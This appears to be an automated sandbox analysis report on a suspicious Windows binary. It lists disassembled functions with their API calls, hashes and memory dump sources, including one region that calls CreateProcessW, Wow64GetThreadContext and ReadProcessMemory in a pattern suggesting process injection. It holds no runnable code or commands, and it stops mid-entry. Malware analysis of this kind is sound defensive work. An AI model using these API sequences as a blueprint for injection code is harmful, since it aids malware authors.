                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EBC746
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$FileNamePath
                                                                        • String ID: aut
                                                                        • API String ID: 3285503233-3010740371
                                                                        • Opcode ID: 8cd4bc4feaedaf30269e0a4db340906c411fa8199f3c096a00251d3c6d80f597
                                                                        • Instruction ID: a9d4bbb2a6627214f1662a78365e5527000d6e3200cc3be22a231b77daa55506
                                                                        • Opcode Fuzzy Hash: 8cd4bc4feaedaf30269e0a4db340906c411fa8199f3c096a00251d3c6d80f597
                                                                        • Instruction Fuzzy Hash: 46D05E7160030EAFEB10AB90EC0EF9A7B6D9700704F0001A07690F50B1DAB5E699CB95
                                                                        Function 00ECF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3452655584d7161eaba99351c20c1672cf731a9c48c1fdcee9914b8e42e8f69
                                                                        • Instruction ID: c025b40c00c9af8150a9b6acc2f3363939ebaed78cc91f80e90e622011a5929a
                                                                        • Opcode Fuzzy Hash: f3452655584d7161eaba99351c20c1672cf731a9c48c1fdcee9914b8e42e8f69
                                                                        • Instruction Fuzzy Hash: 2EF15C716083019FC710DF24C981B6ABBE5FF88314F14996EF999AB351D731E946CB82
                                                                        Function 00E74FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00E75022
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E750CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell__memset
                                                                        • String ID:
                                                                        • API String ID: 928536360-0
                                                                        • Opcode ID: 95a7a8f35dc39558c893b5371898cefc1d32876d216c0317aa900fe7bc328303
                                                                        • Instruction ID: dce02486bfe1def6a4b8eb3a73329359cf1dafe80da65b16511c48ab3e0517d3
                                                                        • Opcode Fuzzy Hash: 95a7a8f35dc39558c893b5371898cefc1d32876d216c0317aa900fe7bc328303
                                                                        • Instruction Fuzzy Hash: 7D318DB1504B05CFD721EF24D8456DBBBE8FF49318F00492EE59EA7241E7B1A948CB92
                                                                        Function 00E9395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __FF_MSGBANNER.LIBCMT ref: 00E93973
                                                                          • Part of subcall function 00E981C2: __NMSG_WRITE.LIBCMT ref: 00E981E9
                                                                          • Part of subcall function 00E981C2: __NMSG_WRITE.LIBCMT ref: 00E981F3
                                                                        • __NMSG_WRITE.LIBCMT ref: 00E9397A
                                                                          • Part of subcall function 00E9821F: GetModuleFileNameW.KERNEL32(00000000,00F30312,00000104,00000000,00000001,00000000), ref: 00E982B1
                                                                          • Part of subcall function 00E9821F: ___crtMessageBoxW.LIBCMT ref: 00E9835F
                                                                          • Part of subcall function 00E91145: ___crtCorExitProcess.LIBCMT ref: 00E9114B
                                                                          • Part of subcall function 00E91145: ExitProcess.KERNEL32 ref: 00E91154
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00E8F507,?,0000000E), ref: 00E9399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1372826849-0
                                                                        • Opcode ID: 168ba960e23689cb15e71ca335e1ca2e96c38006e95c9c97a5d3c91e84a9937b
                                                                        • Instruction ID: 7294a817ed45e4859d0acd1d313a16b6e594f4a6eae9beadc98eb90dc9327512
                                                                        • Opcode Fuzzy Hash: 168ba960e23689cb15e71ca335e1ca2e96c38006e95c9c97a5d3c91e84a9937b
                                                                        • Instruction Fuzzy Hash: C401B5323463119AEE223B35DC52B6A73C99BC5B68F212066F515FB296DFB0DD0086A0
                                                                        Function 00EBC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00EBC385,?,?,?,?,?,00000004), ref: 00EBC6F2
                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00EBC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00EBC708
                                                                        • CloseHandle.KERNEL32(00000000,?,00EBC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EBC70F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        • Opcode ID: 92ef7db9818fea3c004e3e29556c2b8f5461de4c53e87a4bead1bbf4bde255cc
                                                                        • Instruction ID: 714cedbc66045cea830795c6b297bc196d47d837f135c328c71ae934be0244fd
                                                                        • Opcode Fuzzy Hash: 92ef7db9818fea3c004e3e29556c2b8f5461de4c53e87a4bead1bbf4bde255cc
                                                                        • Instruction Fuzzy Hash: 63E08632145224BBD7211B55AC0DFDE7F19AB45764F104110FB14790E097B12525C798
                                                                        Function 00EBBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00EBBB72
                                                                          • Part of subcall function 00E91C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E97A85), ref: 00E91CB1
                                                                          • Part of subcall function 00E91C9D: GetLastError.KERNEL32(00000000,?,00E97A85), ref: 00E91CC3
                                                                        • _free.LIBCMT ref: 00EBBB83
                                                                        • _free.LIBCMT ref: 00EBBB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                        • Instruction ID: 0ae8db30abcaa89c1ea8021a1beef3ef12d2cff1f834db6460b43a5bbfa7c7fd
                                                                        • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                        • Instruction Fuzzy Hash: 6FE05EB174174287DE38A679AE88EF7A3CC4F04365B14285EB569F7186CF64FC4089B8
                                                                        Function 00E72322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E722A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E724F1), ref: 00E72303
                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E725A1
                                                                        • CoInitialize.OLE32(00000000), ref: 00E72618
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EE503A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 3815369404-0
                                                                        • Opcode ID: 1b2e49ea91ff89fdbe107db2ee00533bc04ec75200a1da085466ba0991d0918f
                                                                        • Instruction ID: ac7b0666f9f9bd663f5fc136187ae4bf300e12e69c89d6b5dae7ad81c5417e37
                                                                        • Opcode Fuzzy Hash: 1b2e49ea91ff89fdbe107db2ee00533bc04ec75200a1da085466ba0991d0918f
                                                                        • Instruction Fuzzy Hash: 4C71AEB490128D8FC344EF6AED9049ABBE6FB99364784922ED509D7772CB708404FF24
                                                                        Function 00E73A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsThemeActive.UXTHEME ref: 00E73A73
                                                                          • Part of subcall function 00E91405: __lock.LIBCMT ref: 00E9140B
                                                                          • Part of subcall function 00E73ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E73AF3
                                                                          • Part of subcall function 00E73ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E73B08
                                                                          • Part of subcall function 00E73D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00E73AA3,?), ref: 00E73D45
                                                                          • Part of subcall function 00E73D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00E73AA3,?), ref: 00E73D57
                                                                          • Part of subcall function 00E73D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F31148,00F31130,?,?,?,?,00E73AA3,?), ref: 00E73DC8
                                                                          • Part of subcall function 00E73D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00E73AA3,?), ref: 00E73E48
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E73AB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                        • String ID:
                                                                        • API String ID: 924797094-0
                                                                        • Opcode ID: e38ae357f7ba6323f9e796d598fef1b616416afb1260d7da1e02e34f0453c093
                                                                        • Instruction ID: 7393b4b17895fba7da7dc70cb09115d349308beb687f594c06e1f3e4fada5a5c
                                                                        • Opcode Fuzzy Hash: e38ae357f7ba6323f9e796d598fef1b616416afb1260d7da1e02e34f0453c093
                                                                        • Instruction Fuzzy Hash: B811C0B19083459FC314EF25EC4591AFBEAFBD4360F00891FF989A72A1DB709544DB92
                                                                        Function 00E9E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___lock_fhandle.LIBCMT ref: 00E9EA29
                                                                        • __close_nolock.LIBCMT ref: 00E9EA42
                                                                          • Part of subcall function 00E97BDA: __getptd_noexit.LIBCMT ref: 00E97BDA
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                        • String ID:
                                                                        • API String ID: 1046115767-0
                                                                        • Opcode ID: 7f63aa0e653a95e0a97dc096070c6d03b0d1fb9a9f669285897a21dd5ccf2239
                                                                        • Instruction ID: 85274436990d743b068ff025d1176e8668c39b7bf874ade1acd2e04f7fd9dced
                                                                        • Opcode Fuzzy Hash: 7f63aa0e653a95e0a97dc096070c6d03b0d1fb9a9f669285897a21dd5ccf2239
                                                                        • Instruction Fuzzy Hash: D111C2B28056108ADF11FF64C8423597AE16F81331F262340E5607F3F3DBF48D4096A5
                                                                        Function 00E8F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E9395C: __FF_MSGBANNER.LIBCMT ref: 00E93973
                                                                          • Part of subcall function 00E9395C: __NMSG_WRITE.LIBCMT ref: 00E9397A
                                                                          • Part of subcall function 00E9395C: RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00E8F507,?,0000000E), ref: 00E9399F
                                                                        • std::exception::exception.LIBCMT ref: 00E8F51E
                                                                        • __CxxThrowException@8.LIBCMT ref: 00E8F533
                                                                          • Part of subcall function 00E96805: RaiseException.KERNEL32(?,?,0000000E,00F26A30,?,?,?,00E8F538,0000000E,00F26A30,?,00000001), ref: 00E96856
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3902256705-0
                                                                        • Opcode ID: b9392820977d4a574e11faa190b447c2276d12464dc203f109ecc4d5af245ba6
                                                                        • Instruction ID: 25e02a8e656aad5282f11267d8ca65cad36a194b57631e797cf5d4c248fe665c
                                                                        • Opcode Fuzzy Hash: b9392820977d4a574e11faa190b447c2276d12464dc203f109ecc4d5af245ba6
                                                                        • Instruction Fuzzy Hash: 02F0A43110421EA7DB04BF98EC029EE7BE89F04354F605126FA0CF2181DBB0DB5097A5
                                                                        Function 00E935E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • __lock_file.LIBCMT ref: 00E93629
                                                                          • Part of subcall function 00E94E1C: __lock.LIBCMT ref: 00E94E3F
                                                                        • __fclose_nolock.LIBCMT ref: 00E93634
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: 38ba236d5c48d19dba54a1e236455b9f1e3c10b7e5fa6753d1b8c3d6d3048da3
                                                                        • Instruction ID: b6480ed8065af74e4c86152de6a6c9e158da535822d2f7bcb795409ea5164184
                                                                        • Opcode Fuzzy Hash: 38ba236d5c48d19dba54a1e236455b9f1e3c10b7e5fa6753d1b8c3d6d3048da3
                                                                        • Instruction Fuzzy Hash: AAF0BB72801204AADF11FFB5880275E76E06F41734F259109E411FB2C3C77C8B019B55
                                                                        Function 017CD69D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 017CDE5B
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017CDEF1
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017CDF13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                        • Instruction ID: b962dd26a822cc1b3ef72184b3ef2f43bbc4ed1b481a90885b1663d52f60b8c5
                                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                        • Instruction Fuzzy Hash: B612CE24E18658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A
                                                                        Function 00E92957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __flush.LIBCMT ref: 00E92A0B
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __flush__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 4101623367-0
                                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                        • Instruction ID: 7576f63a80b75d28aa750136dad3e0e6149a47116a4c84a0d32ffbc91f6e6ce2
                                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                        • Instruction Fuzzy Hash: 5C41B672700706BFDF2C8E69C8805AE77B6AF85364F24A53DEA55E7240EBB0DD458B40
                                                                        Function 00E8ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: b723ac65bec49ff3bc6ac4196ca4a32a17699c347a9475c0070a786203d25b98
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: 6231E870A00105DBC718EF68C4809A9FBA6FF49344B64A6A5E40DEB3A5DB30EDC5CB80
                                                                        Function 00EE9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: f903b15e28c83fc438fafec0c7791c08c2ebfd909defce56ae012bf77ad1d644
                                                                        • Instruction ID: 010f6b4c5693145da84a4bdd165c44ed57b261d6d623da579366c066c081b8a0
                                                                        • Opcode Fuzzy Hash: f903b15e28c83fc438fafec0c7791c08c2ebfd909defce56ae012bf77ad1d644
                                                                        • Instruction Fuzzy Hash: C34149705046518FDB24DF19C484B1ABBE0BF45308F1999ACE99E6B362C372E886CF52
                                                                        Function 00E741A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E74214: FreeLibrary.KERNEL32(00000000,?), ref: 00E74247
                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E739FE,?,00000001), ref: 00E741DB
                                                                          • Part of subcall function 00E74291: FreeLibrary.KERNEL32(00000000), ref: 00E742C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
